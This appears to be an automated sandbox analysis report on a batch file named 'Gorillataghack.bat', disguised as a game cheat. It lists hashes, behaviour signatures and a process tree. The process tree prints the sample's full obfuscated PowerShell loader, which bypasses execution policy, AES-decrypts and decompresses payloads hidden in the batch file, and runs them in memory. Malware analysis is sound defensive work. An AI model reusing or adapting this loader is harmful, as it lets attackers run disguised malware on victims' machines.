Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
17-08-2024 01:34
Static task
static1
Behavioral task
behavioral1
Sample
Gorillataghack.bat
Resource
win7-20240704-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Gorillataghack.bat
-
Size
82KB
-
MD5
0ad188366779a1805b951b1425a2d189
-
SHA1
12d28ddc3bd166b0e39f698c2f3bdb5f549bbcd0
-
SHA256
c47c18e4d651aa92dc1b73195fcb3732f65bc5d756e2be4d059c18302d4521f9
-
SHA512
c0f727ba93ab84e515c6cbad121cf0b3a994a7ff9ca44aa74ec56a89fdd436f1b666f8fb0670f9ab4231a32d2baf683a6c36b45a300bfabd24171046ae2f5c8f
-
SSDEEP
1536:ZIO65riaIdL6rVhkck+f7YChR1bSk4sUgG2Zc3LU:ZIOi4pCUh+fx9NHTGagI
Score
6/10
Malware Config
Signatures
-
pid Process 1464 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1464 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1864 wrote to memory of 1692 1864 cmd.exe 32 PID 1864 wrote to memory of 1692 1864 cmd.exe 32 PID 1864 wrote to memory of 1692 1864 cmd.exe 32 PID 1692 wrote to memory of 860 1692 net.exe 33 PID 1692 wrote to memory of 860 1692 net.exe 33 PID 1692 wrote to memory of 860 1692 net.exe 33 PID 1864 wrote to memory of 1464 1864 cmd.exe 34 PID 1864 wrote to memory of 1464 1864 cmd.exe 34 PID 1864 wrote to memory of 1464 1864 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Gorillataghack.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:860
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DbZ9tqJBVMVWIuUt+CFLVGJwPH4Yb6Ql+IH0apxvlrI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdrwPh1XnJAG52TdN4OUwA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rixmV=New-Object System.IO.MemoryStream(,$param_var); $kPvjA=New-Object System.IO.MemoryStream; $QiHHr=New-Object System.IO.Compression.GZipStream($rixmV, [IO.Compression.CompressionMode]::Decompress); $QiHHr.CopyTo($kPvjA); $QiHHr.Dispose(); $rixmV.Dispose(); $kPvjA.Dispose(); $kPvjA.ToArray();}function execute_function($param_var,$param2_var){ $JleoC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uDalF=$JleoC.EntryPoint; $uDalF.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Gorillataghack.bat';$bGCOv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Gorillataghack.bat').Split([Environment]::NewLine);foreach ($LfoqO in $bGCOv) { if ($LfoqO.StartsWith(':: ')) { $hBxae=$LfoqO.Substring(3); break; }}$payloads_var=[string[]]$hBxae.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-